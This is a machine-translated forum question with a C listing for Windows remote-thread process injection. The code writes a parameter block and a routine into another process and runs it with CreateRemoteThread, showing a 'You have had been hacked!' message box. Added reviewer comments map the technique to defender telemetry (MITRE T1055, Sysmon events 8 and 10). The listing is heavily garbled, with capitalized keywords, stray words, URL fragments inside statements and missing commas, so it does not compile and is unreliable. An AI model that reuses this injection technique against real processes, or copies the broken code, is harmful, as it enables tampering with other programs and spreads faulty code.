// NOTE(review): this listing was machine-translated together with the forum post:
// keywords are capitalized ("Typedef", "Char"), stray words were inserted
// ("while forming") and member accesses are split ("Data. DwLoadLibrary"),
// so it does not compile as printed.
# define STRLEN 100
// Parameter block that InjectCode1 fills in locally and copies into the target
// process with WriteProcessMemory; RemoteThreadProc receives a pointer to that copy.
// It holds four API addresses obtained with GetProcAddress in the injecting process
// and four fixed-size strings, so the remote routine reads all of its inputs
// through this one pointer.
Typedef struct _DATA while forming {
DWORD dwLoadLibrary; // address looked up for "LoadLibraryA", stored as a DWORD
DWORD dwGetProcAddress; // address looked up for GetProcAddress
DWORD dwGetModuleHandle; // address looked up for "GetModuleHandleA"
DWORD dwGetModuleFileName; // address looked up for "GetModuleFileNameA"
Char User32Dll [STRLEN]; // module name passed to the LoadLibrary pointer
Char MessageBox1 [STRLEN]; // export name passed to the GetProcAddress pointer
Char Text [STRLEN]; // message box body text
Char Caption [STRLEN]; // message box title
} DATA, * PDATA;
// Forward declaration: InjectCode1 uses this symbol's address as the source of the
// bytes it copies into the target process.
DWORD WINAPI RemoteThreadProc (LPVOID lpParam);
// Copies a parameter block and the bytes of RemoteThreadProc into the process
// identified by dwPid and starts a thread there.
// Steps as written: OpenProcess (PROCESS_ALL_ACCESS), VirtualAllocEx (PAGE_READWRITE)
// plus WriteProcessMemory for the DATA block, VirtualAllocEx (PAGE_EXECUTE_READWRITE)
// plus WriteProcessMemory for the code, CreateRemoteThread, wait, decommit, close.
// Every failure path reports through AfxMessageBox and returns; no status reaches the caller.
// Defender note: this call sequence is the remote-thread form of process injection
// (MITRE ATT&CK T1055). What it leaves observable is a cross-process handle opened with
// full access, a private region in another process that is both writable and executable,
// and a thread whose start address lies in that region rather than in a loaded module.
// Sysmon logs the handle open as event ID 10 (ProcessAccess) and the thread creation as
// event ID 8 (CreateRemoteThread).
Void InjectCode1 (DWORD dwPid) {
// Open a handle to the target process identified by dwPid, requesting every access right.
HANDLE hProcess=OpenProcess (PROCESS_ALL_ACCESS, FALSE, dwPid);
If (hProcess==NULL) {
AfxMessageBox (" process opens failed!" ); return;
}
// NOTE(review): the "https://bbs.csdn.net/topics/" fragments on the next line and further
// down are extraction artifacts of the forum page, not code; the line presumably
// zero-initializes a local DATA variable - confirm against the original post.
DATA, DATA=https://bbs.csdn.net/topics/{0};//access to use the API function to handle
Data. DwLoadLibrary=(DWORD) GetProcAddress call (GetModuleHandle (" kernel32. DLL "),
"LoadLibraryA");
Data. DwGetProcAddress=(DWORD) GetProcAddress call (
GetModuleHandle (" kernel32. DLL) ", "GetProcAddress call");
Data. DwGetModuleHandle=(DWORD) GetProcAddress call (GetModuleHandle (" kernel32. DLL "),
"GetModuleHandleA"); Data. DwGetModuleFileName=(DWORD) GetProcAddress call (
GetModuleHandleA (" kernel32. DLL) ", "GetModuleFileNameA");
// Fill in the strings the remote routine will use for the message box.
Lstrcpy (Data) User32Dll, "user32. DLL");
Lstrcpy (Data) MessageBox1, "MessageBoxA");
Lstrcpy (Data. The Text, "You have had been hacked! (by j. y.) ");
Lstrcpy (Data. The Caption, "Warning");//application data structure of memory space
LPVOID lpData=https://bbs.csdn.net/topics/VirtualAllocEx (hProcess,//process to the allocate memory
NULL,//desired starting address
Sizeof (DATA),//the size of the region to the allocate
MEM_COMMIT | MEM_RESERVE,//the type of allocation
PAGE_READWRITE);//the type of access protection,
// NOTE(review): as printed, the next line is an assignment mixed with extraction junk;
// a NULL check on lpData is presumably intended - confirm against the original post.
If (lpData=NULL https://bbs.csdn.net/topics/=
{AfxMessageBox (" application data area failed!" );
The CloseHandle (hProcess); return;
}
DWORD dwWriteNum=0; if (! WriteProcessMemory (hProcess, lpData, & amp; Data, sizeof (Data), & amp; DwWriteNum))
{
AfxMessageBox (" writing processes data structure failure!" );
// On failure, decommit the data region allocated above. MEM_DECOMMIT leaves the
// address range reserved in the target.
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
The CloseHandle (hProcess); return;
}
// Allocate a second region in the target for the thread routine. The size is a fixed
// constant, not the routine's measured length, and the protection is
// PAGE_EXECUTE_READWRITE.
DWORD dwFunSize=0 x6000;
LPVOID lpCode=VirtualAllocEx (hProcess, NULL,
DwFunSize MEM_COMMIT,
PAGE_EXECUTE_READWRITE); If (lpCode==NULL)
{
AfxMessageBox (" regional application function failure!" );
// NOTE(review): this branch passes lpCode, which is NULL here, to VirtualFreeEx;
// the lpData region allocated earlier is not freed on this path.
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT);
The CloseHandle (hProcess); return;
} the if (! WriteProcessMemory (hProcess, lpCode RemoteThreadProc dwFunSize, & amp; DwWriteNum))
{
AfxMessageBox (" thread function writes process failed!" );
// On failure, decommit both regions before closing the process handle.
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT); The CloseHandle (hProcess);
return;
}
// Start a thread in the target at lpCode, passing lpData as its argument.
HANDLE hRemoteThread=CreateRemoteThread (hProcess, NULL,
0, (LPTHREAD_START_ROUTINE) lpCode,
LpData, 0,
NULL); If (hRemoteThread==NULL)
{
AfxMessageBox (" failed to create the remote thread!" );
// On failure, decommit both regions before closing the process handle.
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT); The CloseHandle (hProcess);
return;
}
AfxMessageBox (" injection successfully!" );
// Block until the remote thread exits; INFINITE means there is no timeout.
The WaitForSingleObject (hRemoteThread, INFINITE);
// Decommit both regions, then close the thread and process handles.
VirtualFreeEx (hProcess, lpData, sizeof (DATA), MEM_DECOMMIT);
VirtualFreeEx (hProcess, lpCode dwFunSize, MEM_DECOMMIT);
The CloseHandle (hRemoteThread); The CloseHandle (hProcess);
}
// Thread routine whose bytes InjectCode1 copies into the target process. lpParam is the
// pointer InjectCode1 passed to CreateRemoteThread, i.e. the target-side copy of DATA.
// Every API call here goes through a function pointer rebuilt from an address stored in
// DATA: load the module named in User32Dll, resolve the export named in MessageBox1,
// query the module file name, show the Text/Caption message box, return 0.
// NOTE(review): the listing is machine-translated; casts and argument lists below are
// garbled (missing commas, "& gt;" for ">", "dwords" for the DWORD type).
DWORD WINAPI RemoteThreadProc (LPVOID lpParam) {
PDATA PDATA=https://bbs.csdn.net/topics/(PDATA lpParam);
// Declare function-pointer variables with the signatures of the APIs to be called.
HMODULE (__stdcall * MyLoadLibrary) (LPCTSTR);
FARPROC (__stdcall * MyGetProcAddress) (HMODULE, LPCSTR);
HMODULE (__stdcall * MyGetModuleHandle) (LPCTSTR);
Int (__stdcall * MyMessageBox) (HWND, LPCTSTR LPCTSTR, UINT);
DWORD (__stdcall * MyGetModuleFileName) (HMODULE LPTSTR, dwords);
// Rebuild callable pointers from the DWORD addresses carried in the parameter block.
MyLoadLibrary=(HMODULE __stdcall * (LPCTSTR)) pData - & gt; DwLoadLibrary;
MyGetProcAddress=(FARPROC __stdcall * (HMODULE, LPCSTR)) pData - & gt; DwGetProcAddress;
MyGetModuleHandle=(HMODULE __stdcall * (LPCSTR)) pData - & gt; DwGetModuleHandle;
MyGetModuleFileName=(DWORD (__stdcall *) (HMODULE LPTSTR, dwords nSize)) pData - & gt; DwGetModuleFileName;
// Load the module named in the block and look up the message box export by name.
HMODULE HMODULE=MyLoadLibrary (pData - & gt; User32Dll);
MyMessageBox=(int (__stdcall *) (HWND, LPCTSTR LPCTSTR, UINT)) MyGetProcAddress (hModule, pData - & gt; MessageBox1);
// szModuleName is filled in by the call below but is not read afterwards in this listing.
Char szModuleName [MAX_PATH]={0};
MyGetModuleFileName (NULL, szModuleName MAX_PATH);
MyMessageBox (0, pData - & gt; Text, pData - & gt; Caption, 0);
return 0;
}
Finally, InjectCode1 (dwPid) is called, and the remote program crashes.
CodePudding user response:
With the AfxMessageBox calls removed, the program succeeds when built under VC6.0 but fails under VS2015. Does this have to do with the compiler?